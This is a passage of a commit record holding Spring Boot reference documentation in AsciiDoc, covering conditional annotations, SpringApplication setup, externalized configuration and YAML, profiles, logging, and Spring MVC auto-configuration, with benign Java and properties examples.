classes. Due to the fact that\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a ``fluent'' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a ``web environment'' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t public void run(String... args) {\n\t \/\/ Do something...\n\t }\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`\n. A `RandomValuePropertySource` that only has properties in `random.*`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `random.int*` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith ``--'', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: if you use environment variables not system properties, most operating systems\ndisallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profiles specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create ``short'' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use ``starter POMs'' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tdev:\n\t\turl: http:\/\/dev.bar.com\n\t\tname: Developer Setup\n\tprod:\n\t\turl: http:\/\/foo.bar.com\n\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nby using a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, If you use the ``Starter POMs'', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing, generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millesecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using ``logging.level.*=LEVEL''\nwhere ``LEVEL'' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are know classloading issues with Java Util Logging that cause problems\nwhen running from an ``executable jar''. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The ``Spring Web MVC framework''\nThe Spring Web MVC framework (often referred to as simply ``Spring MVC'') is a rich\n``model view controller'' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodeResolver` (see below)\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan 